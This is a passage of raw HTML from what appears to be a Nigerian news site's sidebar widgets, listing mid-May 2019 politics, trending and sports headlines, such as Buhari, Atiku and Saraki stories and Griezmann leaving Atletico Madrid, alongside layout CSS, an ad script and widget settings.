class="medium-12 in_widget column meta-container"> <div class="meta row in-container"> </div> </div> </div> <div class="row collapse " itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h3 class="bold xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="PDP, Atiku sabotaging Buhari&#8217;s government" target="_self" href="https://www.nan.ng/news/pdp-atiku-sabotaging-buharis-government/">PDP, Atiku sabotaging Buhari&#8217;s government</a> </h3> <meta itemprop="datePublished" content="2019-05-15T22:29:57+01:00"> <meta itemprop="dateModified" content="2019-05-15T22:29:57+01:00"> </div> </div> </div> </li> </ul> </div></div></div></div> </div> </div> </div><div class="vc_row wpb_row mobile-list vc_custom_1475673630946 full-width"> <div class="vc_col-sm-12 vc_hidden-lg vc_hidden-md label-shade wpb_column vc_column_container"> <div class="wpb_wrapper"> <div class="vc_widget xt_news widget wpb_content_element check_cache" data-cache_enabled="0" data-flush_cache="0"> <style id="xtwidget7b07b8d27429671c101e88c49a4ac605_style" class="widget-instance-style" scoped> #xtwidget7b07b8d27429671c101e88c49a4ac605 .xt-post-title,#xtwidget7b07b8d27429671c101e88c49a4ac605 .xt-post-title > a{font-size:18px;line-height:24px;}#xtwidget7b07b8d27429671c101e88c49a4ac605 .xt-post-title:not(.bold),#xtwidget7b07b8d27429671c101e88c49a4ac605 .xt-post-title:not(.bold) > a{font-weight:300;}@media only screen and (max-width:849px){#xtwidget7b07b8d27429671c101e88c49a4ac605 .xt-post-title,#xtwidget7b07b8d27429671c101e88c49a4ac605 .xt-post-title > a{font-size:18px!important;}} </style><div id="xtwidget7b07b8d27429671c101e88c49a4ac605" class="widget xt_news "><div class="xt-widget-wrap"><div class="xt-widget-content clearfix"> <ul class="news-list xt-ajax-wrap posts-list-small list" > <li class="post-124100 post type-post status-publish format-standard has-post-thumbnail hentry category-headlines category-news tag-defence-headquarters" itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="small-12 large-12 column left last"> <div class="meta default-meta side"> <h5 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Coup against Buhari? DHQ says military not part of it" target="_self" href="https://www.nan.ng/news/coup-against-buhari-dhq-says-military-not-part-of-it/">Coup against Buhari? DHQ says military not part of it</a> </h5> <meta itemprop="datePublished" content="2019-05-14T20:48:00+01:00"> <meta itemprop="dateModified" content="2019-05-14T20:48:00+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2019/02/Service-Chiefs-in-crucial-meeting-with-Buhari-270x180.jpg"> </div> </div> </div> </li> <li class="post-124082 post type-post status-publish format-standard has-post-thumbnail hentry category-headlines category-news tag-acting-efcc-chairman tag-dr-bukola-saraki tag-ibrahim-magu tag-president-of-the-senate tag-saraki-corrupt" itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="small-12 large-12 column left last"> <div class="meta default-meta side"> <h5 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Saraki corrupt, his investigation not personal – Magu" target="_self" href="https://www.nan.ng/news/saraki-corrupt-his-investigation-not-personal-magu/">Saraki corrupt, his investigation not personal – Magu</a> </h5> <meta itemprop="datePublished" content="2019-05-14T17:16:08+01:00"> <meta itemprop="dateModified" content="2019-05-14T17:16:08+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2017/03/Ibrahim-Magu-EFCC-Acting-Chairman-270x180.jpeg"> </div> </div> </div> </li> <li class="post-124060 post type-post status-publish format-standard has-post-thumbnail hentry category-headlines category-news tag-gen-abdulrahman-dambazau tag-minister-of-interior tag-miyetti-allah" itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="small-12 large-12 column left last"> <div class="meta default-meta side"> <h5 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="We did not give Miyetti Allah money – FG" target="_self" href="https://www.nan.ng/news/we-did-not-give-miyetti-allah-money-fg/">We did not give Miyetti Allah money – FG</a> </h5> <meta itemprop="datePublished" content="2019-05-14T10:17:47+01:00"> <meta itemprop="dateModified" content="2019-05-14T10:17:47+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2018/10/Minister-of-Interior-Abdulrahman-Dambazau-270x180.jpg"> </div> </div> </div> </li> <li class="post-124039 post type-post status-publish format-standard has-post-thumbnail hentry category-headlines category-news category-politics tag-june-12-democracy-day tag-may-29-inauguration tag-president-buhari" itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="small-12 large-12 column left last"> <div class="meta default-meta side"> <h5 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Why Buhari&#8217;s May 29 inauguration will be low key" target="_self" href="https://www.nan.ng/news/why-buharis-may-29-inauguration-will-be-low-key/">Why Buhari&#8217;s May 29 inauguration will be low key</a> </h5> <meta itemprop="datePublished" content="2019-05-14T00:01:11+01:00"> <meta itemprop="dateModified" content="2019-05-14T08:22:16+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2019/03/Buhari-and-Osinbajo-270x180.jpg"> </div> </div> </div> </li> <li class="post-123965 post type-post status-publish format-standard has-post-thumbnail hentry category-headlines category-news tag-federal-government tag-security-operations" itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="small-12 large-12 column left last"> <div class="meta default-meta side"> <h5 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="5 security operations ongoing to deal with bandits, kidnappers: FG" target="_self" href="https://www.nan.ng/news/5-security-operations-ongoing-to-deal-with-bandits-kidnappers-fg/">5 security operations ongoing to deal with bandits, kidnappers: FG</a> </h5> <meta itemprop="datePublished" content="2019-05-13T03:37:49+01:00"> <meta itemprop="dateModified" content="2019-05-13T03:37:49+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2018/12/Some-of-the-85-suspected-bandits-arrested-in-Zamfara-by-the-police-e1543611975215-270x180.jpg"> </div> </div> </div> </li> </ul> </div></div></div></div> <div class="wpb_raw_code wpb_content_element wpb_raw_html" > <div class="wpb_wrapper"> <div style="text-align: center"> <script type="text/javascript"> ( function() { if (window.CHITIKA === undefined) { window.CHITIKA = { 'units' : [] }; }; var unit = {"calltype":"async[2]","publisher":"nanng","width":300,"height":250,"sid":"Chitika Default"}; var placement_id = window.CHITIKA.units.length; window.CHITIKA.units.push(unit); document.write('<div id="chitikaAdBlock-' + placement_id + '"></div>'); }()); </script> <script type="text/javascript" src="//cdn.chitika.net/getads.js" async></script> </div> </div> </div> <div class="vc_widget xt_news widget wpb_content_element check_cache" data-cache_enabled="0" data-flush_cache="0"> <style id="xtwidgetac86ff7af2e795e9bfffc4cd19ebeba9_style" class="widget-instance-style" scoped> #xtwidgetac86ff7af2e795e9bfffc4cd19ebeba9 .xt-post-title,#xtwidgetac86ff7af2e795e9bfffc4cd19ebeba9 .xt-post-title > a{font-size:18px;line-height:24px;}#xtwidgetac86ff7af2e795e9bfffc4cd19ebeba9 .xt-post-title:not(.bold),#xtwidgetac86ff7af2e795e9bfffc4cd19ebeba9 .xt-post-title:not(.bold) > a{font-weight:300;}@media only screen and (max-width:849px){#xtwidgetac86ff7af2e795e9bfffc4cd19ebeba9 .xt-post-title,#xtwidgetac86ff7af2e795e9bfffc4cd19ebeba9 .xt-post-title > a{font-size:18px!important;}} </style><div id="xtwidgetac86ff7af2e795e9bfffc4cd19ebeba9" class="widget xt_news "><div class="xt-widget-wrap"><div class="xt-widget-header clearfix"><h3 class="widgettitle">Trending </h3></div><div class="xt-widget-content xt-widget-has-header clearfix"> <ul class="news-list xt-ajax-wrap posts-list-small list" > <li class="post-124163 post type-post status-publish format-standard has-post-thumbnail hentry category-news category-politics tag-london-borough-of-tower-hamlets tag-mayor-of-london-borough-of-tower-hamlets tag-mrs-victoria-obaze" itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="small-12 large-12 column left last"> <div class="meta default-meta side"> <h5 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Another Nigerian Victoria Obaze becomes Mayor in UK" target="_self" href="https://www.nan.ng/news/another-nigerian-victoria-obaze-becomes-mayor-in-uk/">Another Nigerian Victoria Obaze becomes Mayor in UK</a> </h5> <meta itemprop="datePublished" content="2019-05-15T21:12:39+01:00"> <meta itemprop="dateModified" content="2019-05-15T21:12:39+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2019/05/Councilor-Victoria-Obaze-270x180.jpg"> </div> </div> </div> </li> <li class="post-124172 post type-post status-publish format-standard has-post-thumbnail hentry category-headlines category-news tag-alhaji-atiku-abubakar tag-pdp" itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="small-12 large-12 column left last"> <div class="meta default-meta side"> <h5 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="PDP, Atiku sabotaging Buhari&#8217;s government" target="_self" href="https://www.nan.ng/news/pdp-atiku-sabotaging-buharis-government/">PDP, Atiku sabotaging Buhari&#8217;s government</a> </h5> <meta itemprop="datePublished" content="2019-05-15T22:29:57+01:00"> <meta itemprop="dateModified" content="2019-05-15T22:29:57+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2019/02/Atiku-in-Rivers-270x180.jpg"> </div> </div> </div> </li> <li class="post-124168 post type-post status-publish format-standard has-post-thumbnail hentry category-news category-politics tag-nass-new-media-forum tag-national-assembly tag-new-media-forum tag-yemi-itodo" itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="small-12 large-12 column left last"> <div class="meta default-meta side"> <h5 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="NASS inaugurates New Media Forum, Yemi Itodo as President" target="_self" href="https://www.nan.ng/news/nass-inaugurates-new-media-forum/">NASS inaugurates New Media Forum, Yemi Itodo as President</a> </h5> <meta itemprop="datePublished" content="2019-05-15T22:31:25+01:00"> <meta itemprop="dateModified" content="2019-05-15T22:31:25+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2019/05/President-of-the-National-Assembly-New-Media-Forum-Yemi-Itodo-speaking-during-the-inauguration-270x180.jpg"> </div> </div> </div> </li> <li class="post-124174 post type-post status-publish format-standard has-post-thumbnail hentry category-news category-politics tag-buharis-victory tag-oba-akiolu-rilwan tag-oba-of-lagos tag-obasanjo-demystified" itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="small-12 large-12 column left last"> <div class="meta default-meta side"> <h5 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Obasanjo demystified by Buhari’s victory &#8211; Lagos Oba" target="_self" href="https://www.nan.ng/news/obasanjo-demystified-by-buharis-victory-lagos-oba/">Obasanjo demystified by Buhari’s victory &#8211; Lagos Oba</a> </h5> <meta itemprop="datePublished" content="2019-05-15T22:53:29+01:00"> <meta itemprop="dateModified" content="2019-05-15T22:53:29+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2018/08/Kebbi-State-House-of-Assembly-and-Chairman-of-the-Conference-of-States-Speakers-Alh.-Ismaila-Kamba-Oba-Rilwan-Akiolu-and-Mudashiru-Obasa--270x180.jpg"> </div> </div> </div> </li> </ul> </div></div></div></div> <div class="wpb_single_image wpb_content_element vc_align_center"> <figure class="wpb_wrapper vc_figure"> <div class="vc_single_image-wrapper vc_box_border_grey"><img width="300" height="250" src="https://s18694.pcdn.co/wp-content/uploads/2016/08/CBN.gif" class="vc_single_image-img attachment-full" alt="" /></div> </figure> </div> <div class="vc_widget xt_news widget wpb_content_element check_cache" data-cache_enabled="0" data-flush_cache="0"> <style id="xtwidget414813153d451888d28158c7535d38fa_style" class="widget-instance-style" scoped> #xtwidget414813153d451888d28158c7535d38fa .xt-post-title,#xtwidget414813153d451888d28158c7535d38fa .xt-post-title > a{font-size:18px;line-height:22px;}#xtwidget414813153d451888d28158c7535d38fa .xt-post-title:not(.bold),#xtwidget414813153d451888d28158c7535d38fa .xt-post-title:not(.bold) > a{font-weight:300;}#xtwidget414813153d451888d28158c7535d38fa .xt-post-title.featured,#xtwidget414813153d451888d28158c7535d38fa .xt-post-title.featured > a{font-size:24px;line-height:26px;font-weight:300;}@media only screen and (max-width:849px){#xtwidget414813153d451888d28158c7535d38fa .xt-post-title,#xtwidget414813153d451888d28158c7535d38fa .xt-post-title > a{font-size:18px!important;}}@media only screen and (max-width:849px){#xtwidget414813153d451888d28158c7535d38fa .xt-post-title.featured,#xtwidget414813153d451888d28158c7535d38fa .xt-post-title.featured > a{font-size:24px!important;}} </style><div id="xtwidget414813153d451888d28158c7535d38fa" class="widget xt_news "><div class="xt-widget-wrap"><div class="xt-widget-header clearfix"><h3 class="widgettitle">Politics </h3></div><div class="xt-widget-content xt-widget-has-header clearfix"> <div class="row collapse"> <div class="medium-12 column"> <ul class="news-list featured-posts-1-col xt-ajax-wrap list" > <li itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="medium-12 in_widget column"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/politics/reps-speakership-former-imo-assembly-speaker-drums-support-for-nwajiuba/"> <img width="270" height="180" src="https://s18694.pcdn.co/wp-content/uploads/2018/07/Nigerias-House-of-Reps-270x180.jpg" class="attachment-xt-medium wp-post-image" alt="Nigeria&#039;s House of Reps" itemprop="image" srcset="https://s18694.pcdn.co/wp-content/uploads/2018/07/Nigerias-House-of-Reps-270x180.jpg 270w, https://s18694.pcdn.co/wp-content/uploads/2018/07/Nigerias-House-of-Reps-165x110.jpg 165w, https://s18694.pcdn.co/wp-content/uploads/2018/07/Nigerias-House-of-Reps-480x320.jpg 480w" sizes="(max-width: 270px) 100vw, 270px" /> <div class="icon-overlay"><span class="fa fa fa fa-no-icon"></span></div> </a> </div> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class="bold featured xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Reps Speakership: Former Imo Assembly Speaker drums support for Nwajiuba" target="_self" href="https://www.nan.ng/politics/reps-speakership-former-imo-assembly-speaker-drums-support-for-nwajiuba/">Reps Speakership: Former Imo Assembly Speaker drums support for Nwajiuba</a> </h4> <meta itemprop="datePublished" content="2019-05-16T14:38:11+01:00"> <meta itemprop="dateModified" content="2019-05-16T14:38:11+01:00"> </div> </div> </div> </li> <li itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Obasanjo demystified by Buhari’s victory &#8211; Lagos Oba" target="_self" href="https://www.nan.ng/news/obasanjo-demystified-by-buharis-victory-lagos-oba/">Obasanjo demystified by Buhari’s victory &#8211; Lagos Oba</a> </h4> <meta itemprop="datePublished" content="2019-05-15T22:53:29+01:00"> <meta itemprop="dateModified" content="2019-05-15T22:53:29+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2018/08/Kebbi-State-House-of-Assembly-and-Chairman-of-the-Conference-of-States-Speakers-Alh.-Ismaila-Kamba-Oba-Rilwan-Akiolu-and-Mudashiru-Obasa--270x180.jpg"> </div> </div> </div> </li> <li itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="NASS inaugurates New Media Forum, Yemi Itodo as President" target="_self" href="https://www.nan.ng/news/nass-inaugurates-new-media-forum/">NASS inaugurates New Media Forum, Yemi Itodo as President</a> </h4> <meta itemprop="datePublished" content="2019-05-15T22:31:25+01:00"> <meta itemprop="dateModified" content="2019-05-15T22:31:25+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2019/05/President-of-the-National-Assembly-New-Media-Forum-Yemi-Itodo-speaking-during-the-inauguration-270x180.jpg"> </div> </div> </div> </li> <li itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Another Nigerian Victoria Obaze becomes Mayor in UK" target="_self" href="https://www.nan.ng/news/another-nigerian-victoria-obaze-becomes-mayor-in-uk/">Another Nigerian Victoria Obaze becomes Mayor in UK</a> </h4> <meta itemprop="datePublished" content="2019-05-15T21:12:39+01:00"> <meta itemprop="dateModified" content="2019-05-15T21:12:39+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2019/05/Councilor-Victoria-Obaze-270x180.jpg"> </div> </div> </div> </li> <li itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Gov. Al-Makura sacks political appointees May 29" target="_self" href="https://www.nan.ng/news/gov-al-makura-sacks-political-appointees-may-29/">Gov. Al-Makura sacks political appointees May 29</a> </h4> <meta itemprop="datePublished" content="2019-05-15T17:24:44+01:00"> <meta itemprop="dateModified" content="2019-05-15T17:24:44+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2018/11/Governor-Tanko-Al-Makura-270x180.jpg"> </div> </div> </div> </li> </ul> </div> </div> </div></div></div></div><div class="vc_widget xt_news widget wpb_content_element check_cache" data-cache_enabled="0" data-flush_cache="0"> <style id="xtwidget49962025149cd0260ce0f067679c53e3_style" class="widget-instance-style" scoped> #xtwidget49962025149cd0260ce0f067679c53e3 .xt-post-title,#xtwidget49962025149cd0260ce0f067679c53e3 .xt-post-title > a{font-size:18px;line-height:22px;}#xtwidget49962025149cd0260ce0f067679c53e3 .xt-post-title:not(.bold),#xtwidget49962025149cd0260ce0f067679c53e3 .xt-post-title:not(.bold) > a{font-weight:300;}#xtwidget49962025149cd0260ce0f067679c53e3 .xt-post-title.featured,#xtwidget49962025149cd0260ce0f067679c53e3 .xt-post-title.featured > a{font-size:24px;line-height:26px;font-weight:300;}@media only screen and (max-width:849px){#xtwidget49962025149cd0260ce0f067679c53e3 .xt-post-title,#xtwidget49962025149cd0260ce0f067679c53e3 .xt-post-title > a{font-size:18px!important;}}@media only screen and (max-width:849px){#xtwidget49962025149cd0260ce0f067679c53e3 .xt-post-title.featured,#xtwidget49962025149cd0260ce0f067679c53e3 .xt-post-title.featured > a{font-size:24px!important;}} </style><div id="xtwidget49962025149cd0260ce0f067679c53e3" class="widget xt_news "><div class="xt-widget-wrap"><div class="xt-widget-header clearfix"><h3 class="widgettitle">Sports </h3></div><div class="xt-widget-content xt-widget-has-header clearfix"> <div class="row collapse"> <div class="medium-12 column"> <ul class="news-list featured-posts-1-col xt-ajax-wrap list" > <li itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="medium-12 in_widget column"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/football-sports/rangers-tighten-grip-on-npfl-group-with-defeat-of-bendel-insurance/"> <img width="270" height="180" src="https://s18694.pcdn.co/wp-content/uploads/2019/02/Rangers-players-celebrate-CAF-Conf.-group-match-win-270x180.jpg" class="attachment-xt-medium wp-post-image" alt="Rangers players celebrate CAF Conf. group match win" itemprop="image" srcset="https://s18694.pcdn.co/wp-content/uploads/2019/02/Rangers-players-celebrate-CAF-Conf.-group-match-win-270x180.jpg 270w, https://s18694.pcdn.co/wp-content/uploads/2019/02/Rangers-players-celebrate-CAF-Conf.-group-match-win-165x110.jpg 165w, https://s18694.pcdn.co/wp-content/uploads/2019/02/Rangers-players-celebrate-CAF-Conf.-group-match-win-480x320.jpg 480w" sizes="(max-width: 270px) 100vw, 270px" /> <div class="icon-overlay"><span class="fa fa fa fa-no-icon"></span></div> </a> </div> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class="bold featured xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Rangers tighten grip on NPFL group with defeat of Bendel Insurance" target="_self" href="https://www.nan.ng/football-sports/rangers-tighten-grip-on-npfl-group-with-defeat-of-bendel-insurance/">Rangers tighten grip on NPFL group with defeat of Bendel Insurance</a> </h4> <meta itemprop="datePublished" content="2019-05-15T23:59:04+01:00"> <meta itemprop="dateModified" content="2019-05-15T23:59:04+01:00"> </div> </div> </div> </li> <li itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Griezmann quits Atletico Madrid" target="_self" href="https://www.nan.ng/sports/griezmann-quits-atletico-madrid/">Griezmann quits Atletico Madrid</a> </h4> <meta itemprop="datePublished" content="2019-05-15T07:18:34+01:00"> <meta itemprop="dateModified" content="2019-05-15T07:18:34+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2019/05/Antonio-Griezmann-270x180.jpg"> </div> </div> </div> </li> <li itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Chris Coleman sacked by China&#8217;s Hebei" target="_self" href="https://www.nan.ng/sports/chris-coleman-sacked-by-chinas-hebei/">Chris Coleman sacked by China&#8217;s Hebei</a> </h4> <meta itemprop="datePublished" content="2019-05-15T07:08:06+01:00"> <meta itemprop="dateModified" content="2019-05-15T07:08:06+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2019/05/Chris-Coleman-sacked-by-Chinas-Hebei--270x180.jpg"> </div> </div> </div> </li> <li itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Ecuador president honours Valencia of Man United" target="_self" href="https://www.nan.ng/sports/ecuador-president-honours-valencia-of-man-united/">Ecuador president honours Valencia of Man United</a> </h4> <meta itemprop="datePublished" content="2019-05-15T07:01:55+01:00"> <meta itemprop="dateModified" content="2019-05-15T07:01:55+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2019/05/Antonio-Valencia-middle-honoured-by-President-Moreno-of-Ecuador--270x180.jpg"> </div> </div> </div> </li> <li itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Skomina to referee UEFA Champions League final" target="_self" href="https://www.nan.ng/sports/skomina-to-referee-uefa-champions-league-final/">Skomina to referee UEFA Champions League final</a> </h4> <meta itemprop="datePublished" content="2019-05-14T21:31:08+01:00"> <meta itemprop="dateModified" content="2019-05-14T21:31:08+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2019/05/Damir-Skomina-centre-referee-in-UEFA-Champions-League-final-on-June-1-270x180.jpg"> </div> </div> </div> </li> </ul> </div> </div> </div></div></div></div><div class="vc_widget xt_news widget wpb_content_element check_cache" data-cache_enabled="0" data-flush_cache="0"> <style id="xtwidget6167556ce6b5d697b47587edd41c1262_style" class="widget-instance-style" scoped> #xtwidget6167556ce6b5d697b47587edd41c1262 .xt-post-title,#xtwidget6167556ce6b5d697b47587edd41c1262 .xt-post-title > a{font-size:28px;line-height:34px;}@media only screen and (max-width:849px){#xtwidget6167556ce6b5d697b47587edd41c1262 .xt-post-title,#xtwidget6167556ce6b5d697b47587edd41c1262 .xt-post-title > a{font-size:28px!important;}} </style><div id="xtwidget6167556ce6b5d697b47587edd41c1262" class="widget xt_news "><div class="xt-widget-wrap"><div class="xt-widget-header clearfix has-pagination"><div class="xt-spinner-wrap prev-next"> <div class="xt-spinner prev-next sk-circle"> <div class="sk-circle1 sk-child"></div> <div class="sk-circle2 sk-child"></div> <div class="sk-circle3 sk-child"></div> <div class="sk-circle4 sk-child"></div> <div class="sk-circle5 sk-child"></div> <div class="sk-circle6 sk-child"></div> <div class="sk-circle7 sk-child"></div> <div class="sk-circle8 sk-child"></div> <div class="sk-circle9 sk-child"></div> <div class="sk-circle10 sk-child"></div> <div class="sk-circle11 sk-child"></div> <div class="sk-circle12 sk-child"></div> </div></div><nav class="xt-news-pagination navigation paging-navigation type-prev-next top-right right" data-type="prev-next" data-position="top-right" data-animation="_fade" data-animationdir="left-right" data-instance="xtwidget6167556ce6b5d697b47587edd41c1262"><div class="pagination loop-pagination"><a data-page="1" data-direction="previous" href="#" class="page-disabled page-numbers previous-page"><span class="fa fa-angle-left"></span> Prev</a><a data-page="2" data-direction="next" href="#" class="page-numbers next-page">Next <span class="fa fa-angle-right"></span></a></div></nav> <script id="script_xtwidget6167556ce6b5d697b47587edd41c1262" class="widget-instance-script"> var xtwidget6167556ce6b5d697b47587edd41c1262 = {title: "",action_title: "",action_obj_id: "",action_ext_link: "",css_animation: "",query_type: "most-recent",date_range: "",custom_query: "",selection: "",include_posts: "",related_to: "",related_to_type: "categories",category: "",exclude_category: "",query_post_formats: "yes",number: "1",offset: "",pagination: "prev-next",pagination_position: "top-right",pagination_arrows_only: "",pagination_show_current: "",pagination_animation: "_fade",pagination_animation_direction: "left-right",pagination_max_pages: "5",pagination_infinite_max_pages: "",page: "",format: "post-format-gallery",view: "grid|col:1",grid_gutter: "",meta_options: "meta-all-over",meta_over_padding: "",show_title_on_hover: "",show_excerpt_on_hover: "",show_category_on_hover: "",image_height_type: "custom-height",image_height: "400",columns_width: "",columns_posts_count: "",slider_height: "",thumbnails_size: "",featured_thumbnails_size: "",custom_thumbnails_size_w: "",custom_thumbnails_size_h: "",custom_featured_thumbnails_size_w: "",custom_featured_thumbnails_size_h: "",thumbnails_filter: "",embed_video: "",show_excerpt: "",show_excerpt_only_featured: "",show_date: "",show_date_only_featured: "",datetime_ago: "",show_author: "",show_author_only_featured: "",show_stats: "",show_stats_only_featured: "",show_category: "",show_category_only_featured: "",max_categories: "",title_length: "",title_font_size: "28",title_font_weight: "",title_line_height: "34",title_margin_bottom: "",excerpt_length: "30",excerpt_font_size: "",excerpt_font_weight: "",excerpt_line_height: "",excerpt_margin_bottom: "",featured_title_length: "",featured_title_font_size: "",featured_title_font_weight: "",featured_title_line_height: "",featured_title_margin_bottom: "",featured_excerpt_length: "55",featured_excerpt_font_size: "",featured_excerpt_font_weight: "",featured_excerpt_line_height: "",featured_excerpt_margin_bottom: ""}; </script></div><div class="xt-widget-content xt-widget-has-header clearfix"> <ul class="news-list posts-grid xt-ajax-wrap small-block-grid-1 small-grid-offset meta-all-over meta-options medium-block-grid-1 large-block-grid-1" > <li class="post-124105 post type-post status-publish format-gallery has-post-thumbnail hentry category-news category-photo-news tag-nass-leaders tag-president-buhari tag-senator-bukola-saraki post_format-post-format-gallery" itemscope="" itemtype="http://schema.org/BlogPosting" data-equalizer-watch> <div class="row collapse has-background custom-height " onclick="location.href='https://www.nan.ng/news/buhari-breaks-fast-with-saraki-dogara-nass-leaders/'" style="height:400px; background-image: url(https://s18694.pcdn.co/wp-content/uploads/2019/05/Moment-to-banter-Buhari-with-Senate-President-Bukola-Saraki-and-other-NASS-leaders--480x320.jpg)"> <div class="medium-12 in_widget column"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/news/buhari-breaks-fast-with-saraki-dogara-nass-leaders/"> <img width="480" height="320" src="https://s18694.pcdn.co/wp-content/uploads/2019/05/Moment-to-banter-Buhari-with-Senate-President-Bukola-Saraki-and-other-NASS-leaders--480x320.jpg" class="attachment-xt-large wp-post-image" alt="" itemprop="image" srcset="https://s18694.pcdn.co/wp-content/uploads/2019/05/Moment-to-banter-Buhari-with-Senate-President-Bukola-Saraki-and-other-NASS-leaders--480x320.jpg 480w, https://s18694.pcdn.co/wp-content/uploads/2019/05/Moment-to-banter-Buhari-with-Senate-President-Bukola-Saraki-and-other-NASS-leaders--300x200.jpg 300w, https://s18694.pcdn.co/wp-content/uploads/2019/05/Moment-to-banter-Buhari-with-Senate-President-Bukola-Saraki-and-other-NASS-leaders--768x512.jpg 768w, https://s18694.pcdn.co/wp-content/uploads/2019/05/Moment-to-banter-Buhari-with-Senate-President-Bukola-Saraki-and-other-NASS-leaders--1024x683.jpg 1024w, https://s18694.pcdn.co/wp-content/uploads/2019/05/Moment-to-banter-Buhari-with-Senate-President-Bukola-Saraki-and-other-NASS-leaders--165x110.jpg 165w, https://s18694.pcdn.co/wp-content/uploads/2019/05/Moment-to-banter-Buhari-with-Senate-President-Bukola-Saraki-and-other-NASS-leaders--270x180.jpg 270w, https://s18694.pcdn.co/wp-content/uploads/2019/05/Moment-to-banter-Buhari-with-Senate-President-Bukola-Saraki-and-other-NASS-leaders--e1557867036154.jpg 700w" sizes="(max-width: 480px) 100vw, 480px" /> </a> <div class="icon-overlay"><span class="fa fa fa-camera-retro"></span></div> </div> <div class="medium-12 in_widget column meta-container gradient-wrap"> <div class="meta row in-container"> <h3 class="bold xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Buhari breaks fast with Saraki, Dogara, NASS leaders" target="_self" href="https://www.nan.ng/news/buhari-breaks-fast-with-saraki-dogara-nass-leaders/">Buhari breaks fast with Saraki, Dogara, NASS leaders</a> </h3> <meta itemprop="datePublished" content="2019-05-14T21:57:45+01:00"> <meta itemprop="dateModified" content="2019-05-14T22:50:55+01:00"> </div> </div> </div> </li> </ul> </div></div></div></div><div class="vc_widget xt_news widget wpb_content_element check_cache" data-cache_enabled="0" data-flush_cache="0"> <style 